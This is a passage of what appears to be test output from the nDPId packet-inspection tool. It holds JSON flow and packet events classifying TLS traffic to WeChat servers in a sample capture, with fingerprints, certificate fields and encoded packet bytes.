maGlM9uIlF\/rv5c1A55dbIdj8naBbyQ7fTwTJFbjISBkJmpaQoU2kc\/zz
iP44xaoDUxaRt9Ry\/806C0HPovj+JC6hKAJhd7IU3lz1cd2EcOR09Ulbh6GcnGtGoIEgMSnOqlHSHFOvhwMJOgqMdjV4Ts3j6kz4nuUL7P9W38WCZ6Et6v6MCfJC1NHlb+BiknubpqgZZ7mM9\/dQzJwaHAVm1pExnTA0Qtn9u2w0Ob0wTvtwWHLqB8+w1X5lLgz+g0\/KazNnFwZsVC8NJt7gXfJimXlNiQyyoVZPRU5TsryE76p7eJsfK2K3vD+oV2xOy0odJivKdVU9d\/b0lN4vXAAJXGR8apbNgPqwivAZHIvQdWqFgNwio4MLv0L8zBSqiIiaIpEMDbJPlGf3NTa8KHL9KuF0\/XkvPuIqyQ1vikTJWv3M0PfnYGX\/91JwgIycN3X4tfAJPTYU1bJR8H9lqbTS68wW7e8n7Z9kn4BsSK8WdGfSG\/BGchlsNazeLO6dljFOzNH1Nb0yqv79UpRl3Kr1HkZo+mQcyTmdDq73MBTVTodPICJb5JR1YLjVlWLyhlubA3PMAZhd7v493hq7IuxuvrhHldQDGHsYcPZ0+ZYWLqkDletWw1l3zV0GxsjRhJ3s3iffY9XBpGE8EG39zicWNmnu8THVvBYw\/7ASp9iDFLWiJkigPswdmPFhkbbEWproj9M3h6bBS7Z9ohy6yUXPGG6RKTKX45Eg\/Pm2f3Y3bPQ15p4S5E260\/wYzmk6Pco8MZXXOtCrfsbgBU3U\/QFaYJziOi8kV14C9ocoOj7UNbOPlK4JGIThUQC22wBIoO4QcICqfGi12dFi3\/dZawWcVCDgNfdmaRqjA7vn2Ew3dMX8AfiCfUGFCye6yKRfSC\/KcvJGql1sIadq+izTaBp+jfWADKBhJTOB7x6VUd2Bs6qIc6mkvKSj4SxqM+NPNL5GVHDR9qjJ4H5zSi"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167355723,"flow_last_seen":1492167355723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167355723,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1492167355723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167355723,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8P4ZAAEAG1bbAqAFny82XotNLAbtsCoMeAAAAAKACchAveAAAAgQFtAQCCAoAMLyYAAAAAAEDAwc="} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353937,"flow_last_seen":1492167355743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167355743,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":126,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353937,"flow_last_seen":1492167355744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167355744,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1492167356077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167356077,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700uz8YPYbAqDH6ASN8iq2QAAAgQFoAQCCApFrUFyADC8mAEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1492167356077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167356077,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0P4dAAEAG1b3AqAFny82XotNLAbtsCoMfs\/GD2YAQAOUQHAAAAQEICgAwvPFFrUFy"} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167355723,"flow_last_seen":1492167356077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167356077,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167355723,"flow_last_seen":1492167356488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167356488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":153,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167355723,"flow_last_seen":1492167356489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167356489,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1492167360622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1492167360622,"pkt":"eJKcD6iO8IQvSpdgCABFoABrfSgAADcGnizYOs1OwKgBZwG7ugsgLP3V+HJvr4AYAV2wggAAAQEICvap78EAL9cAFwMDADI7\/WDixcApjMc4oo49oFJiwuyoshtW5rSqz9ahoHcSOkzcmjO3CkNO6pgK6XLAf2uLNg=="} 
-00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1492167360626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1492167360626,"pkt":"eJKcD6iO8IQvSpdgCABFoABr4O8AADcGG8es2RdOwKgBZwG7z+SKJZg8+z2t2oAYAVTREQAAAQEICn7IL7IAL9cCFwMDADL\/QQeiav2tbjoNjgJzOU4UPNZPR4RzRuOQ+h3eXjLhIIWjbE1Sb3YuyocNPQRCTo9EPA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167366908,"flow_last_seen":1492167366908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167366908,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1492167366908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167366908,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8lZ5AAEAGf57AqAFny82XotNMAbt+X1IbAAAAAKACchBDOAAAAgQFtAQCCAoAMMeFAAAAAAEDAwc="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167367159,"flow_last_seen":1492167367159,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167367159,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1492167367159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367159,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8UGVAAEAGxNfAqAFny82XotNNAbtphJemAAAAAKACchASSQAAAgQFtAQCCAoAMMfDAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1492167367227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367227,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG700zSrc67fl9SHKASN8jkhQAAAgQFoAQCCApF0bHCADDHhQEDAwc="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1492167367227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167367227,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0lZ9AAEAGf6XAqAFny82XotNMAbt+X1Ic0q3OvIAQAOVJ0gAAAQEICgAwx9RF0bHC"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167366908,"flow_last_seen":1492167367228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167367228,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1492167367489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367489,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG7002nXL3IaYSXp6ASN8hVJQAAAgQFoAQCCApFrUycADDHwwEDAwc="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1492167367489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167367489,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0UGZAAEAGxN7AqAFny82XotNNAbtphJenp1y9yYAQAOW6bQAAAQEICgAwyBZFrUyc"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167366908,"flow_last_seen":1492167367549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167367549,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167366908,"flow_last_seen":1492167367550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167367550,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167377896,"flow_last_seen":1492167377896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167377896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1492167377896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167377896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KM9AAEAGqhzAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT1vHQAAAQEICgAw0kAycerX"} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1492167377936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167377936,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0Fj0AADQGCA\/YOs2OwKgBZwG7wnvXK\/KwzDlUhIAQAVQWugAAAQEICjJymzYAMHos"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167378674,"flow_last_seen":1492167378674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167378674,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1492167378674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167378674,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8mSRAAEAGfBjAqAFny82XotNOAbtKc0omAAAAAKACchBzmgAAAgQFtAQCCAoAMNMCAAAAAAEDAwc="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167378926,"flow_last_seen":1492167378926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167378926,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1492167378926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167378926,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cOpAAEAGpFLAqAFny82XotNPAbtxraOrAAAAAKACchDymgAAAgQFtAQCCAoAMNNBAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1492167379033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167379033,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG7005qx4IjSnNKJ6ASN8i96gAAAgQFoAQCCApF0b0+ADDTAgEDAwc="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1492167379034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167379034,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0mSVAAEAGfB\/AqAFny82XotNOAbtKc0onaseCJIAQAOUjLAAAAQEICgAw01xF0b0+"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378674,"flow_last_seen":1492167379034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167379034,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1492167379279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167379279,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG7009k83t+ca2jrKASN8iurAAAAgQFoAQCCApFrVgaADDTQQEDAwc="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1492167379279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167379279,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cOtAAEAGpFnAqAFny82XotNPAbtxraOsZPN7f4AQAOUT8AAAAQEICgAw05lFrVga"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167378674,"flow_last_seen":1492167379396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167379396,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378674,"flow_last_seen":1492167379397,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167379397,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
